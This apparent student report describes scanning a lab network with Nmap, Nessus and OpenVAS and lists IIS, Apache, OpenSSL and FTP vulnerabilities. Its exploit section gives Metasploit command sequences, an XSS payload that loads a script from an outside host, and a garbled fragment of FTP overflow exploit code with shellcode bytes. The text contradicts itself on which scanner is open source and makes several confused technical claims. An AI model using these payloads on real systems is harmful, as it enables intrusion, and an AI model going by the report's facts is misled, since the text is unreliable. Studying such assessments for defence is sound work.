Vulnerability Scanning

Executive Summary

OpenVAS and Nessus are programs that are used to detect the vulnerabilities of a computer system. Vulnerability refers to a fault in the order that can be exploited by unauthorized persons to access the system. Nessus is an open source software that scans networks, identifies vulnerability and scores the severity. On the other hand, OpenVAS is a closed source software that identifies vulnerabilities in a machine by scanning the running services. This report details the vulnerabilities found in web servers and Windows servers and the exploits associated with such vulnerabilities.

Task Summary

Nmap, a network scanning tool was used to identify open ports, actives hosts and operating systems within the network. The identified hosts were then scanned using OpenVAS and Nessus to identify vulnerabilities. Upon identification of the vulnerabilities, further research was done to establish the exploits associated with each and the attendant security risk.

Results of the Vulnerability Assessment

Nessus Results

Nmap identified the following machines running web servers including 172.16.11.24/26, 172.16.11.34/26, 172.16.11.43/26 and 172.16.11.9/26.  Of these, 172.16.11.43/26 and 172.16.11.34/26 ran a Windows Server operating system. 172.16.11.11/26 and 172.16.11.24/26 ran Linux. Other servers identified ran Windows Vista, Windows 2000 SP1 and Windows NT among others. Other services scanned include FTP on 172.16.11.43/26 and SSL/TL on 172.16.11.24/26.

 

Web Server Vulnerabilities

The web server vulnerabilities identified by Nessus include Apache Server ETag Header Information Disclosure (on 172.16.11.24/26 and 172.16.11.43/26), Microsoft IIS 6.0 Unsupported Version Detection (172.16.11.34/26), Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow and Microsoft IIS Unicode Remote Command Execution (on server 172.16.11.43/26).

Operating System Vulnerabilities

The most common OS vulnerability identified was outdated OS and Unsupported versions of the OS. This was common to both Windows OS and UNIX, for example, the “Unix OS Unsupported version detected on 172.16.11.24/26.

FTP server vulnerability

Nessus identified “FTP Privileged Port Bounce Scan” vulnerability on 172.16.11..43/26.

OpenVAS results

Web Server Vulnerability

OpenVAS identified a high level “Apache Web Server End of Life Detection (windows) vulnerability on 172.16.11..9/2. Microsoft IIS FTP NLST Stack Overflow was identified on 172.16.11.43/26. Additionally, IIS XSS via 404 Error was identified.

Secure Socket Layer (SSL) service vulnerability

OpenVAS identified SSL/TLS: Open SSL CCS Man in the Middle-Security Bypass vulnerability on 172.16.11.24.

Threats Associated With Vulnerabilities.

Apache Server ETag Header Information Disclosure vulnerability predisposes to security breach since the Etag Header is providing the server’s inode numbers. The inode number contains information like file type, permissions, timestamps, file location, and permissions. Disclosure of this information aids attack and access to sensitive information (Michael Cross, 2007). An exploit is not necessary for this vulnerability. OpenBSD has released a patch that solves this issue (“core – Apache HTTP Server Version 2.4”, 2019)

Microsoft IIS 6.0 Unsupported Version Detection implies that the Microsoft Internet Information Service 6.0 is nolonger supported and therefore no new security patches will be released by the vendor. As such, the system is susceptible to current threats.

Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow implies that the IIS web server has malware that may be remotely used by an attacker to execute codes on the remote system. An attacker can execute a buffer overflow attack on the system due to the uncontrolled buffer in the ISAPI extension. Similarly, Microsoft IIS Unicode Remote Command Execution allows an attacker to execute a program remotely (Microsoft, 2003).

Unix OS Unsupported version detected on 172.16.11.24/26 vulnerability is due to end of its lifecycle. As such, the OS cannot support new security updates. Most programs in this system are also outdated. This can be solved by updating to the latest OS version.

FTP Privileged Port Bounce Scan predisposes to FTP bounce attack where the FTP server is manipulated to connect to third-party devices in the network. The other computers in the network are thus susceptible to unsuspected attack.

Microsoft IIS FTP NLST Stack Overflow predisposes to various threats depending on the IIS versions. In IIS 5.0 it allows attackers to remote level access to the system. This can be mitigated by limiting write access only to authorized management and removing directories that provide anonymous users with write access.

IIS XSS via 404 Error vulnerability predisposes the system to a cross-site scripting attack. Cross-site scripting attack involves an attacker sending a malicious code in the component of a compromised website or application. The client then grants permission to the malware unknowingly enabling an attacker to obtain higher permissions and access to sensitive information. This can be solved by updating to MS02-18 patch by Microsoft.

Open SSL CCS Man in the Middle-Security Bypass vulnerability as the name suggests predisposes to Man in the Middle Attack. Here, an attacker manipulates the “change cipher spec” messages using a zero-length master key. The end to end encryption between client and the server is thus breached for instance through the creation of TLS handshakes/ CCS injections.

Exploits for the vulnerabilities

Metasploit can be used to exploit the vulnerabilities above. To begin with, Open SSL CCS Man in the Middle-Security Bypass exploit can be conducted using the auxiliary/scanner/SSL/open ssl_ccs module. The command used is as follows:

msf>use auxiliary/scanner/openssl_ccs

MSF auxiliary (openssl_ccs) > SHOW ACTIONS

…actions…

Msf auxiliary (openssl_ccs) >set ACTION <action name>

Msfauxiliary(openssl_ccs)> show options

…show and set options…%

Msfauxiliary(openssl_ccs) > run

( (Masashi Kikuchi)

The cross scripting attack in IIS XSS via 404 Error can be exploited using the following code:  http://<img%09 src=” %09nerror=” document.scripts [0].src %27http%5Cx3a%5Cx2f jscript.dk%5Cx2ftest.js%27; “>script@YOUR.TLD/SomeNonExistantPath. This code executes the url http://jscript.dk/test which will be sent to the TLD server. The server will execute the malicious script when loaded (Larholm, 2002).

Microsoft IIS FTPd NLST Stack Overflow can be exploited using the following code: exploit connect_login based =rand_text_alpha_upper(10) res =send_cmd([‘MKD’, based ],true)print_status(res.strip)if(res !~/directory created/)print_error(“The root directory of the FTP server is not writeable”) disconnect returnend res =send_cmd([‘CWD’, based ],true)print_status(res.strip) egg =rand_text_alpha_upper(4) hun =”\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0″.

Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow vulnerability can be exploited through this code:

>use exploit/windows/iis/ms01_23 printer

msf exploit(ms01_023_printer).>show targets

…targets…

msf exploit(ms01_023_printer)>set TARGET<target-id>

msf exploit(ms01_023_printer)>show options

…show and set options…

msf exploit(ms01_023_printer) >exploit

(Rapid7)

 

Nessus versus OpenVAS

While Nessus is a closed source software, OpenVAS is an open source software thus widely available. Nessus has wide functionality including the vulnerability, the exploits, and mitigation strategies. On the other hand, OpenVAS reports are deficient in detail. Nessus can find out some weaknesses of the system that OpenVAS fails to detect.

Moreover, for the same parameter, Nessus was established to have more variables that OpenVAS. A limitation common to both is redundancy results; that is the same outcome is presented more than once in the report. Nessus is customizable by end users for example addition of plugins and can be operated across many platforms unlike OpenVAS (Lu, 2015).

 

References

Han, S. W., Kwon, H., Hahn, C., Koo, D., & Hur, J. (2016, July). A survey on MITM and its countermeasures in the TLS handshake protocol. In 2016 Eighth International Conference on Ubiquitous and Future Networks (ICUFN) (pp. 724-729). IEEE.

Lu, L., Han, Z., & Chen, Z. (2015, November). OpenStack Vulnerability Detection and Analysis. In International Conference on Applications and Techniques in Information Security (pp. 245-251). Springer, Berlin, Heidelberg.

Masashi Kikuchi, C. Y. (n.d.). Retrieved February 16, 2019, from https://www.rapid7.com/db/modules/auxiliary/scanner/ssl/openssl_ccs: https://www.rapid7.com/db/modules/auxiliary/scanner/ssl/openssl_ccs

Michael Cross, S. P. (2007). Web Application Vulnerabilities Detect, Exploit, Prevent. Burlington: Syngpress Publishing Inc, Elsevier Inc.

Microsoft. (2003, June 23). docs.microsoft.com. Retrieved February 16, 2019, from microsoft.com: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-023

Rapid7. (n.d.). Retrieved February 16, 2019, from Vulnerability and Exploit Database: https://www.rapid7.com/db/modules/exploit/windows/iis/ms01_023_printer

 

Do you need high quality Custom Essay Writing Services?

Custom Essay writing Service